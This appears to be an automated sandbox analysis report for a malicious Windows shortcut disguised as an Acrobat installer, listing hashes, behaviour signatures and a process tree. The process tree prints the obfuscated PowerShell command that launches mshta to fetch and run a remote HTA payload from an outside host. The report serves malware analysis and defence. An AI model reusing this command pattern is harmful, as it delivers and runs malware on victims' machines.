Overview

overview

10

Static

static

AcrobatInstaller.lnk

windows7-x64

3

AcrobatInstaller.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    230s
  • max time network
    336s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    09-12-2022 08:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AcrobatInstaller.lnk

  • Size

    1KB

  • MD5

    efc13d85b551ba2d426d3754d642ca11

  • SHA1

    43202b41ce4c2cd23cbba769227dce2f50750f27

  • SHA256

    0cd9826b702404e2f9b6854c672409422f578afd63d43795e8e370b212d403d6

  • SHA512

    3c09654c48cc9f32c240b153137750eb798cbdddc2fa7cca72ff4cac2a83563c90b9f66a13230b8af9903aa16b60b0e3a7b2bbb96ff4226cbae5962f410aff1e

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\AcrobatInstaller.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1476
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\?i*\S*3?\m*ta.e* ('https://cruds-club.com/AcrobatInstaller' + '.h' + 'ta')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:392

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/392-93-0x000007FEF3940000-0x000007FEF4363000-memory.dmp

    Filesize

    10.1MB

    Download

  • memory/392-95-0x00000000024E4000-0x00000000024E7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/392-94-0x000007FEF2DE0000-0x000007FEF393D000-memory.dmp

    Filesize

    11.4MB

    Download

  • memory/392-96-0x000000001B750000-0x000000001BA4F000-memory.dmp

    Filesize

    3.0MB

    Download

  • memory/392-97-0x00000000024E4000-0x00000000024E7000-memory.dmp

    Filesize

    12KB

    Download

  • memory/392-98-0x00000000024EB000-0x000000000250A000-memory.dmp

    Filesize

    124KB

    Download

  • memory/1476-54-0x000007FEFBDD1000-0x000007FEFBDD3000-memory.dmp

    Filesize

    8KB

    Download